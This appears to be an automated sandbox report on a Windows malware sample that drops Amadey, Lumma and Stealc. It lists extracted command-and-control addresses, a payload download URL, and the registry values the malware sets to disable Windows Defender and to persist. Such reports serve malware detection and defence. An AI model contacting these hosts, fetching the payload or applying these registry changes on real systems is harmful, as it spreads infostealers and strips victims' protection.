Analysis
-
max time kernel
121s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
28/03/2025, 17:35
Static task
static1
Behavioral task
behavioral1
Sample
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Resource
win10v2004-20250313-en
General
-
Target
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
-
Size
1.8MB
-
MD5
8480b3439f6f2fe71ff8136c8475a0e1
-
SHA1
8f787c424f7a1ac854d26b723008ea29d9f1b1aa
-
SHA256
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8
-
SHA512
2b72c1f30549156dcf42aff32d2967580147a1cc499ca93f7a3e2b773e814bd9c368772d6ed02031c086b2c8376b405d30c7a43abff0729732232ad008e97958
-
SSDEEP
49152:fyPxPnQHIr7nIXvPvwrARGSLEUBLEffrLrr90+:6PxfQoTIXvPYlSLEWgXrLrr
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://wxayfarer.live/ALosnz
https://oreheatq.live/gsopp
https://castmaxw.run/ganzde
https://weldorae.digital/geds
https://steelixr.live/aguiz
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://-smeltingt.run/giiaus
https://8ferromny.digital/gwpd
https://esccapewz.run/ANSbwqy
https://travewlio.shop/ZNxbHi
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://holidamyup.today/AOzkns
https://mtriplooqp.world/APowko
https://jpsmeltingt.run/giiaus
https://ferromny.digital/gwpd
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/760-554-0x00000000012F0000-0x0000000001724000-memory.dmp healer behavioral1/memory/760-555-0x00000000012F0000-0x0000000001724000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" ba43420fc1.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" ba43420fc1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" ba43420fc1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" ba43420fc1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" ba43420fc1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection ba43420fc1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" ba43420fc1.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ba43420fc1.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications ba43420fc1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" ba43420fc1.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempLIDEUZQB3G3F7ZVBBO8EBBEQRQYSTTUF.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ef03f308e2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 425b117859.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 436e1cc62f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ba43420fc1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Or1ARiR.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0b8eec4302.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b801a9df2a.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 36 2320 powershell.exe 47 2616 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 2320 powershell.exe 2616 powershell.exe 392 powershell.exe 1004 powershell.exe 2156 powershell.exe 1348 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 21 IoCs
flow pid Process 47 2616 powershell.exe 6 1016 rapes.exe 6 1016 rapes.exe 32 2208 futors.exe 32 2208 futors.exe 34 1016 rapes.exe 34 1016 rapes.exe 34 1016 rapes.exe 34 1016 rapes.exe 34 1016 rapes.exe 34 1016 rapes.exe 34 1016 rapes.exe 34 1016 rapes.exe 46 2208 futors.exe 5 1016 rapes.exe 35 2208 futors.exe 36 2320 powershell.exe 14 1016 rapes.exe 17 1016 rapes.exe 20 1016 rapes.exe 33 2208 futors.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 1716 takeown.exe 2544 icacls.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 425b117859.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b801a9df2a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Or1ARiR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Or1ARiR.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempLIDEUZQB3G3F7ZVBBO8EBBEQRQYSTTUF.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 425b117859.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b801a9df2a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0b8eec4302.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ef03f308e2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ba43420fc1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ef03f308e2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 436e1cc62f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 436e1cc62f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ba43420fc1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempLIDEUZQB3G3F7ZVBBO8EBBEQRQYSTTUF.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0b8eec4302.exe -
Executes dropped EXE 35 IoCs
pid Process 1016 rapes.exe 1976 EPTwCQd.exe 2028 Rm3cVPI.exe 2656 Or1ARiR.exe 956 xZRvIQ5.exe 2644 amnew.exe 2208 futors.exe 2112 gron12321.exe 3024 v7942.exe 2020 bot.exe 1708 alex1dskfmdsf.exe 960 apple.exe 620 22.exe 1568 22.exe 3048 Bell_Setup16.exe 2624 Bell_Setup16.tmp 2096 Bell_Setup16.exe 296 Bell_Setup16.tmp 1956 38eb6df4e0.exe 2104 bot.exe 2716 TempLIDEUZQB3G3F7ZVBBO8EBBEQRQYSTTUF.EXE 1172 jokererer.exe 2380 0b8eec4302.exe 2052 ef03f308e2.exe 2660 483d2fa8a0d53818306efeb32d3.exe 2832 425b117859.exe 2604 436e1cc62f.exe 2376 56d42e9071.exe 2028 svchost015.exe 760 ba43420fc1.exe 1096 b801a9df2a.exe 1620 7IIl2eE.exe 3552 svchost015.exe 2056 TbV75ZR.exe 3344 Rm3cVPI.exe -
Identifies Wine through registry keys 2 TTPs 11 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine Or1ARiR.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine TempLIDEUZQB3G3F7ZVBBO8EBBEQRQYSTTUF.EXE Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 0b8eec4302.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine ef03f308e2.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 425b117859.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 436e1cc62f.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine ba43420fc1.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine b801a9df2a.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine rapes.exe -
Loads dropped DLL 64 IoCs
pid Process 1684 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 1016 rapes.exe 1016 rapes.exe 3016 WerFault.exe 3016 WerFault.exe 3016 WerFault.exe 3016 WerFault.exe 1016 rapes.exe 1016 rapes.exe 1016 rapes.exe 1016 rapes.exe 1016 rapes.exe 1016 rapes.exe 1824 WerFault.exe 1824 WerFault.exe 1824 WerFault.exe 1824 WerFault.exe 1016 rapes.exe 2644 amnew.exe 2208 futors.exe 2208 futors.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 940 WerFault.exe 2208 futors.exe 2208 futors.exe 1332 WerFault.exe 1332 WerFault.exe 1332 WerFault.exe 1332 WerFault.exe 1016 rapes.exe 1016 rapes.exe 2208 futors.exe 2208 futors.exe 2476 WerFault.exe 2476 WerFault.exe 2476 WerFault.exe 2476 WerFault.exe 1016 rapes.exe 960 apple.exe 960 apple.exe 960 apple.exe 960 apple.exe 2208 futors.exe 3048 Bell_Setup16.exe 2624 Bell_Setup16.tmp 2096 Bell_Setup16.exe 1016 rapes.exe 296 Bell_Setup16.tmp 296 Bell_Setup16.tmp 2300 regsvr32.exe 2208 futors.exe 2208 futors.exe 2320 powershell.exe 2320 powershell.exe 2208 futors.exe 2208 futors.exe 2984 WerFault.exe 2984 WerFault.exe 2984 WerFault.exe 2984 WerFault.exe 1016 rapes.exe 1016 rapes.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 1716 takeown.exe 2544 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features ba43420fc1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ba43420fc1.exe -
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\425b117859.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361350101\\425b117859.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\436e1cc62f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10043050101\\436e1cc62f.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\56d42e9071.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361360101\\56d42e9071.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\ba43420fc1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361370101\\ba43420fc1.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\b801a9df2a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10043060101\\b801a9df2a.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\38eb6df4e0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361130101\\38eb6df4e0.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361140121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\ef03f308e2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10361340101\\ef03f308e2.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00020000000001cb-336.dat autoit_exe behavioral1/files/0x000500000001a488-509.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3256 tasklist.exe 3472 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
pid Process 1684 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 1016 rapes.exe 2656 Or1ARiR.exe 2716 TempLIDEUZQB3G3F7ZVBBO8EBBEQRQYSTTUF.EXE 2380 0b8eec4302.exe 2052 ef03f308e2.exe 2660 483d2fa8a0d53818306efeb32d3.exe 2832 425b117859.exe 2604 436e1cc62f.exe 760 ba43420fc1.exe 1096 b801a9df2a.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2604 set thread context of 2028 2604 436e1cc62f.exe 159 PID 1096 set thread context of 3552 1096 b801a9df2a.exe 183 -
Drops file in Program Files directory 46 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpSvc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpRes.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpRTP.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpCom.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpEvMsg.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCmdRun.exe cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCommu.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MSASCui.exe cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpAsDesc.dll cmd.exe -
Drops file in Windows directory 15 IoCs
description ioc Process File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File created C:\Windows\Tasks\futors.job amnew.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 800 sc.exe 2328 sc.exe 2276 sc.exe 2976 sc.exe 1068 sc.exe 2824 sc.exe 2332 sc.exe 2764 sc.exe 2828 sc.exe 1040 sc.exe 952 sc.exe 2996 sc.exe 2784 sc.exe 1548 sc.exe 3052 sc.exe 1288 sc.exe 2680 sc.exe 2832 sc.exe 2940 sc.exe 1120 sc.exe 2988 sc.exe 2272 sc.exe 2344 sc.exe 1600 sc.exe 1208 sc.exe 1596 sc.exe 1892 sc.exe 2992 sc.exe 2376 sc.exe 1724 sc.exe 2868 sc.exe 1888 sc.exe 2608 sc.exe 2684 sc.exe 2144 sc.exe 2900 sc.exe 2100 sc.exe 1900 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 56 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ef03f308e2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 38eb6df4e0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 56d42e9071.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Or1ARiR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ba43420fc1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 436e1cc62f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b801a9df2a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 425b117859.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 56d42e9071.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0b8eec4302.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 56d42e9071.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1680 timeout.exe 1676 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 1632 taskkill.exe 1700 taskkill.exe 2916 taskkill.exe 1676 taskkill.exe 1156 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings firefox.exe -
